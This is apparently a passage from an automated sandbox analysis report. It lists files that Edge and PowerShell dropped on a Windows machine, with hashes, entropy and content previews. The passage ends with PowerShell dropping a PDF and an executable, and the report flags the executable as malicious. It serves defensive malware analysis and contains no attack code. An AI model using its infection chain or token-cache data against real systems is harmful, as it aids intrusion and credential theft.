                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YTyLSmafBoTfQsWwTbDozRLuLgfGBkGAeekVy8HfzXNPIAclWAAPy:YWLSGTQ9wTbDo9LuLgfGBPAzkVj/T8lv
                                                                                                                                                                                                                                                                                                                        MD5:93BC416D294377B0AC954F2B88C4ECC4
                                                                                                                                                                                                                                                                                                                        SHA1:A9C4953B25B235843FE9E296DFC61736E2C8A303
                                                                                                                                                                                                                                                                                                                        SHA-256:1D366C6A490E86841F9D17B76B5F7C2741446A0EF0E05DF89D87D65EC32CF152
                                                                                                                                                                                                                                                                                                                        SHA-512:CE650FB250A06D4C912CDF5B124793CBDCCCD2DAF892B593B2A37C79416B921E6C69A9FFA172DC61EE115DBD71A73F39582796FA6EBC2BD7B8679A695A71D994
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"version":1,"cache_data":[{"file_hash":"e0ec5b7ffe06f92c","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1733953232733775}]}

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):85
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQw:YQ3Kq9X0dMgAEiLI2
                                                                                                                                                                                                                                                                                                                        MD5:265DB1C9337422F9AF69EF2B4E1C7205
                                                                                                                                                                                                                                                                                                                        SHA1:3E38976BB5CF035C75C9BC185F72A80E70F41C2E
                                                                                                                                                                                                                                                                                                                        SHA-256:7CA5A3CCC077698CA62AC8157676814B3D8E93586364D0318987E37B4F8590BC
                                                                                                                                                                                                                                                                                                                        SHA-512:3CC9B76D8D4B6EDB4C41677BE3483AC37785F3BBFEA4489F3855433EBF84EA25FC48EFEE9B74CAB268DC9CB7FB4789A81C94E75C7BF723721DE28AEF53D8B529
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b5ae220e-e669-49c2-b7c7-90e6dc3619ac.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44906
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.095043527219012
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWN4i1zNtmU9v1NPLDGfPb9chcKJDSgzMMd6qD47u3S:+/Ps+wsI7ynO1IKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:CB52F51D1018539BEC0E1487D61CB467
                                                                                                                                                                                                                                                                                                                        SHA1:F0B5F0F46F36080EB2BF402958BF472D7C2FE648
                                                                                                                                                                                                                                                                                                                        SHA-256:B74327343B71BB98BA3EB23299F6ECD43FFF9451326EC48DDD0B205BEDC6B1DC
                                                                                                                                                                                                                                                                                                                        SHA-512:A6AACECCBACB000057D117F29015E57D537CD409D5C21DF0959D9D0C31E0B4B9F9792A0485F250957B9878C655805C6394EB801D34BB0C596A4AB9AC92DD1486
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c2b2a288-8930-4ff1-8929-94625fcb015b.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):46297
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.087060067537334
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:gMkbJrT8IeQc5FK4ob/bi1zNtmU9v8ULlkFo/PvXDgh1+wLCioBJDSgzMMd6qD4E:gMk1rT8HNK4x1vkh8wLFoBtSmd6qE7I
                                                                                                                                                                                                                                                                                                                        MD5:7C0520ADA61CEB8F774F565BE7F68155
                                                                                                                                                                                                                                                                                                                        SHA1:E3EB195A6D53FA3AD0AA5503B7F7C4C7B225844E
                                                                                                                                                                                                                                                                                                                        SHA-256:AAAE838BA76273AFA05B67EA513F755C0868EDB6E837ADB54748B5411AF88856
                                                                                                                                                                                                                                                                                                                        SHA-512:9B885040D19CEFB4967A8A1D2696CFE6273671E8181F9AD9EBCDAF2CED7442DE3BC1F2B44E1CBC9133BDDF7918FF2A0237942B2EC9E829C38AA4BEAE5C145827
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326025230846","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852429"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fdc32f13-c9e0-4f34-8c9b-9ea3fff2dc45.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                        Size (bytes):46297
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.087063444577874
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:gMkbJrT8IeQc5F94ob/bi1zNtmU9v8ULlkFo/PvXDgh1+wLCioBJDSgzMMd6qD4E:gMk1rT8HN94x1vkh8wLFoBtSmd6qE7I
                                                                                                                                                                                                                                                                                                                        MD5:89EEE84092835ED3900CEE5DB30E4ED1
                                                                                                                                                                                                                                                                                                                        SHA1:F372BB0896AEFDFEFAA46384569B6D3FF8C58489
                                                                                                                                                                                                                                                                                                                        SHA-256:BEBC71E5C4DC840D2C536D3077D25D5C0637733246A91C6818294D6AECCB20E6
                                                                                                                                                                                                                                                                                                                        SHA-512:0F32D370BFE179EB8848844CD494462C06569BF32BCCB59408523BF684A1F2EF21469D814958DAE919C7C6F5AE5262DFFEF4F6A5F41CF13E3726106227D91E16
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326025230846","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852429"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2278
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8578117414966613
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKxrgxExl9Il8uCCB0ouSyp1zA81mluatKGUneiKMmd1rc:mJYkCNuSq1zA8sYO8eMd
                                                                                                                                                                                                                                                                                                                        MD5:2426231453A7500C54D102D89756CF70
                                                                                                                                                                                                                                                                                                                        SHA1:C38145F669DE4B348786AAB2F7A124F7532DF08C
                                                                                                                                                                                                                                                                                                                        SHA-256:624379630FBA866D99F3CA38F490F0FA09EA571D9C0D76D48FE40A1B3B72FC9A
                                                                                                                                                                                                                                                                                                                        SHA-512:949AE891003378B95D40B0DE10D6FC17DE4CEDD5945F3BC0CD44D684FEA6EAD47FB8AE0649517978F1BE4F4B6105ECEC7BF07101E984B3F38C6EA36E3E011542
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.H.a.m.+.z.J.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.H.o.e.f.I.4.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):4622
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.994691559436571
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:96:QYkLrCCRC1HWweu77r5bKwjQ9+OtrbyNx0l1h:QxLrc1IK7r5J8UEKL0h
                                                                                                                                                                                                                                                                                                                        MD5:F8ADD31E55BDC3412B31DA2294ACED27
                                                                                                                                                                                                                                                                                                                        SHA1:1F85CA35BB1E7BC9DF022B62A252BE4B7CC5EC9D
                                                                                                                                                                                                                                                                                                                        SHA-256:17D213B5CDD4C0186CDA13B23B222ADC5DFD4B18CAE7FD1B0FAFEE1DF92F4B96
                                                                                                                                                                                                                                                                                                                        SHA-512:A5CFFEB50390BF8851B880229D51428C5E54B2B68D1EA9BE54C142F0155F97E619890C886D269A0959994D653170C92A6830CC3634F4B8A4890C4D9FA126F6FE
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".b.u.9.M.4.S.p.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.H.o.e.f.I.4.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2684
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.910321967517351
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKx68Wa7x6dxl9Il8uCql1yzzI/56ZCLLZnrfyUnFkmJeFmd/vc:aUYkq/yz4r2mQFj
                                                                                                                                                                                                                                                                                                                        MD5:CD01737F97A23E6BACD498FEB6E4D2F0
                                                                                                                                                                                                                                                                                                                        SHA1:E8840D33AC9161FA34EC35B87E3BD9C120F9B6EA
                                                                                                                                                                                                                                                                                                                        SHA-256:04761F03068694D0DFB49A56B4CA1984A76B6F0121475C6E52487C77CF47DF81
                                                                                                                                                                                                                                                                                                                        SHA-512:8CFBADC3169E568B849FD0BE40783EA691F69A82B78223E2558B9A6939682896E8902693BD4F8F9075A3F250141AC8B80C78289F93A6A0287963574529516BA5
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".i.I.0.h.E.v.x.p.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.H.o.e.f.I.4.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):61147
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.078086286400755
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHBqdIJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPE
                                                                                                                                                                                                                                                                                                                        MD5:96F9023163A6C17B352680E896DEA496
                                                                                                                                                                                                                                                                                                                        SHA1:DD5EC72232854F5F14C41AFA756274139EBF4FCF
                                                                                                                                                                                                                                                                                                                        SHA-256:A0D599D68CBF5FFC3B9B299967A6B8CCA4BE9B5F3E91EC70C50CBA413D0F2071
                                                                                                                                                                                                                                                                                                                        SHA-512:CF42E8BD1F0ECA8E76D2FB6C7A0132B608D278893C067707FB0B912E1D47C7525E2D92D65EBD599D25453D1A5CF448364026B60133262C4662FDDC4EA6B1B6A2
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0818136700495735
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Nlllulrlgll//Z:NllUml
                                                                                                                                                                                                                                                                                                                        MD5:BCE202BE96167104C292ABBA72DDA325
                                                                                                                                                                                                                                                                                                                        SHA1:2F7A5938BD57E9769440EDF0B6700DD001DF7AC6
                                                                                                                                                                                                                                                                                                                        SHA-256:680BC38EEF1B5175C4E728CEA436662498DC7F8E5570CBA66D7F9627AC0A0AEE
                                                                                                                                                                                                                                                                                                                        SHA-512:195CAC106561793B62A216DA442AA663BDEDCDFCA2920848583880B25489E03888AF732B6F07834DB3A4E892F24020CC8E2C37D54F1B61F20BEEFCCDB38F0189
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:@...e................................................@..........

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1225428425.pdf

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):106848
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                                                        MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                                                        SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                                                        SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                                                        SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1718218388.exe

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2764800
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.070345780359035
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:/VHFXSzmqiDqCbm1gickVsPT1uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuTuuuu4:/VHFXSzmqsegfkVsBuuuuuuuuuuuuuu/
                                                                                                                                                                                                                                                                                                                        MD5:DFED8A8BF0531716FD932A0A81CB14CD
                                                                                                                                                                                                                                                                                                                        SHA1:F74A768C54B5067995B0518A0107A834B1B4665B
                                                                                                                                                                                                                                                                                                                        SHA-256:42458188732FFAD7AC8223445549DFD5A1B5DFDC48BDDB5DDD1286A22040EFE9
                                                                                                                                                                                                                                                                                                                        SHA-512:1F906F926779A1DF22DD3D5C6ED3F92D4F3D7B5AE3C8DF0C21AD094868A1C7DD5C4C5C4B57A1161F5FC6EEF7F9BC3957E9DF2CD250F0ACAD837C359E54B3708E
                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 55%
